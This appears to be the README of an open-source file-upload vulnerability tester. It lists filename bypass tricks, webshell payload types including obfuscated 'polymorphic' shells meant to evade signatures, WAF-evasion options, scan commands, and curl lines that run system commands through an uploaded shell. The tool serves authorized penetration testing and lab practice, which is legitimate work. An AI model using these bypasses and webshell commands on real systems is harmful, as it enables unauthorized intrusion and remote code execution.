Advanced penetration testing tool for identifying file upload vulnerabilities in web applications
Designed for bug bounty hunters, security researchers, and penetration testers to automate the detection of insecure file upload implementations.
| Feature | v1.0 | v2.0 |
|---|---|---|
| Bypass Techniques | ❌ Basic upload only | ✅ 20+ bypass methods |
| Payload Types | ❌ PHP only | ✅ PHP, ASP, ASPX, JSP + polymorphic |
| Authentication | ❌ None | ✅ DVWA + custom login support |
| WAF Detection | ❌ None | ✅ Cloudflare, ModSecurity, AWS WAF, etc. |
| Multi-threading | ❌ Sequential | ✅ Concurrent testing |
| RCE Verification | ✅ Basic | ✅ Advanced with multiple commands |
| Reports | ❌ None | ✅ JSON + HTML with styling |
| Output | ❌ Plain text | ✅ Colored terminal UI |
- Features
- Installation
- Quick Start
- Usage Examples
- Bypass Techniques
- Payload Types
- Report Samples
- Roadmap
- Legal Disclaimer
- Contributing
- Author
- ✅ 20+ Bypass Techniques — Double extensions, null bytes, case variations, path traversal, Unicode tricks
- ✅ Multi-payload Support — PHP, ASP, ASPX, JSP, plus polymorphic variants
- ✅ WAF Detection — Identifies Cloudflare, ModSecurity, AWS WAF, Imperva, Akamai, F5, and more
- ✅ Session Management — Authenticate to DVWA or custom apps before testing
- ✅ RCE Verification — Automatically verify if uploaded shells are executable
- ✅ Multi-threaded Scanning — Parallel testing for faster results
- ✅ Professional Reports — JSON + HTML reports with vulnerability details
- ✅ Colored Output — Beautiful terminal UI with status indicators
- 🔍 Smart Path Discovery — Tests 12+ common upload directories
- 🛡️ WAF Bypass Suggestions — Recommendations based on detected firewall
- 🔄 Polymorphic Payloads — Auto-generated obfuscated shells to evade signatures
- 📊 Detailed Logging — Track all upload attempts and responses
- ⚙️ Flexible Configuration — Customize every aspect via CLI arguments
- Python 3.8 or higher
- pip (Python package manager)
# Clone the repository
git clone https://github.com/HariCipher/Upload-file-vuln-tester.git
cd Upload-file-vuln-tester
# Install dependencies
pip install -r requirements.txt
# Make executable (Linux/Mac)
chmod +x upload_tester.pypython upload_tester.py http://target.com/upload.php --base http://target.compython upload_tester.py http://localhost/vulnerabilities/upload/ \
--base http://localhost/ \
--dvwa-login \
--security-level low \
--verify-rce \
--reportpython upload_tester.py http://target.com/upload.php \
--base http://target.com \
--threads 5 \
--payload-type php_poly \
--verify-rce \
--report \
--verbose
Perfect for practicing and learning:
# Low security
python upload_tester.py http://localhost/vulnerabilities/upload/ \
--base http://localhost/ \
--dvwa-login \
--username admin \
--password password \
--security-level low \
--verify-rce \
--report
# Medium security (more restricted)
python upload_tester.py http://localhost/vulnerabilities/upload/ \
--base http://localhost/ \
--dvwa-login \
--security-level medium \
--threads 3 \
--reportpython upload_tester.py https://example.com/admin/upload \
--base https://example.com \
--custom-login https://example.com/login \
--credentials "username=admin,password=secret123" \
--success-indicator "dashboard" \
--field-name "file" \
--verify-rce \
--report \
--verbose# Stealthy scan - single thread, no RCE verification
python upload_tester.py https://target.com/upload \
--base https://target.com \
--threads 1 \
--payload-type php \
--report
# Aggressive scan - multiple threads with all checks
python upload_tester.py https://target.com/upload \
--base https://target.com \
--threads 10 \
--payload-type php_poly \
--verify-rce \
--report \
--verbosepython upload_tester.py https://protected-site.com/upload \
--base https://protected-site.com \
--ignore-waf \
--threads 1 \
--payload-type php_poly \
--report- Double Extension —
shell.php.jpg - Reverse Double Extension —
shell.jpg.php - Case Variation —
shell.pHp,shell.PhP,shell.PHP - Alternative Extensions —
shell.php3,shell.php4,shell.php5,shell.phtml,shell.phps
- Null Byte Injection —
shell.php%00.jpg - Null Byte Alternative —
shell%00.php - Trailing Dot —
shell.php.(Windows truncation) - Trailing Space —
shell.php(space after extension) - Multiple Dots —
shell.php..jpg
- Path Traversal —
../../shell.php - Windows Path Traversal —
..\\..\\shell.php - Unicode Right-to-Left Override — Uses U+202E character
- MIME Type Fuzzing — Tests 7+ different MIME types per file
| Type | Server | Description |
|---|---|---|
| php | Apache/Nginx with PHP | Standard PHP webshell with system() |
| asp | IIS (Classic ASP) | VBScript-based shell |
| aspx | IIS with .NET | C# ASP.NET webshell |
| jsp | Tomcat/JBoss | Java Server Pages shell |
| php_poly | Apache/Nginx with PHP | Polymorphic obfuscated PHP shell |
All payloads accept commands via ?cmd= parameter:
# After successful upload
curl "http://target.com/uploads/shell.php?cmd=whoami"
curl "http://target.com/uploads/shell.php?cmd=id"
curl "http://target.com/uploads/shell.php?cmd=ls"{
"scan_info": {
"target": "http://localhost/vulnerabilities/upload/",
"start_time": "2026-03-26 14:30:00",
"payloads_tested": 24,
"tool": "Upload-File-Vuln-Tester v2.0"
},
"vulnerabilities": [
{
"technique": "Double Extension",
"filename": "shell.php.jpg",
"upload_url": "http://localhost/vulnerabilities/upload/",
"file_url": "http://localhost/hackable/uploads/shell.php.jpg",
"rce_verified": true,
"rce_output": "www-data"
}
],
"summary": {
"total_tests": 24,
"successful_uploads": 3,
"failed_uploads": 21,
"vulnerability_found": true,
"severity": "Critical"
},
"recommendations": [
"Implement strict file type validation based on file content",
"Store uploaded files outside the web root directory",
"Use a whitelist of allowed file extensions"
]
}Beautiful, professional HTML reports with:
- Executive summary with severity badges
- Detailed vulnerability listings
- Interactive sections
- Security recommendations
- Timestamp and metadata
Screenshot Preview:
- 🎯 CTF Practice — Test file upload challenges in competitions
- 📚 Learning Platform — Understand common bypass techniques
- 🔬 Lab Environment — Practice on DVWA, bWAPP, WebGoat
- 🐛 Bug Bounty — Automate initial file upload testing
- 🔐 Penetration Testing — Include in web app assessment workflow
- 📋 Compliance Testing — Verify upload security controls
- Integration with Burp Suite
- Support for GraphQL file uploads
- Machine learning-based pattern detection
- Docker containerization
- CI/CD pipeline integration
- Web-based UI dashboard
- Database integration for historical tracking
- API endpoint for programmatic access
- Plugin system for custom bypass techniques
This tool is intended for authorized security testing only.
✅ Have explicit written permission to test the target
✅ Only use on systems you own or have authorization to test
✅ Follow responsible disclosure practices
✅ Comply with local laws and regulations
❌ Use against systems without permission
❌ Use for malicious purposes
❌ Deploy uploaded shells on production systems
❌ Ignore the ethical boundaries of security research
The author assumes no liability for misuse of this tool.
Contributions are welcome! Here's how you can help:
- 🐛 Report Bugs — Open an issue with reproduction steps
- 💡 Suggest Features — Share ideas for improvements
- 🔧 Submit PRs — Add new bypass techniques or payloads
- 📝 Improve Docs — Help make documentation clearer
- ⭐ Star the Repo — Show your support
# Fork the repo
# Create a feature branch
git checkout -b feature/new-bypass-technique
# Make your changes
# Test thoroughly
python upload_tester.py --help
# Commit with clear messages
git commit -m "Add MIME type bypass technique"
# Push and create PR
git push origin feature/new-bypass-techniqueHarilal P
- 🎓 B.Tech Computer Science Engineering Student
- 🔐 Cybersecurity Enthusiast | SOC Analyst Track
- 🌐 GitHub: @HariCipher
- 💼 LinkedIn: Harilal P
- 📧 Email: thisisharilal@gmail.com
- Home-SOC-Lab — Complete SOC + Pentesting lab setup
- More coming soon...
MIT License - see LICENSE file for details
- OWASP — For security research and testing frameworks
- DVWA Team — For providing an excellent learning platform
- Bug Bounty Community — For continuous knowledge sharing
- Cybersecurity Researchers — For developing bypass techniques
If this tool helped you, consider giving it a star!
Built with ❤️ for the cybersecurity community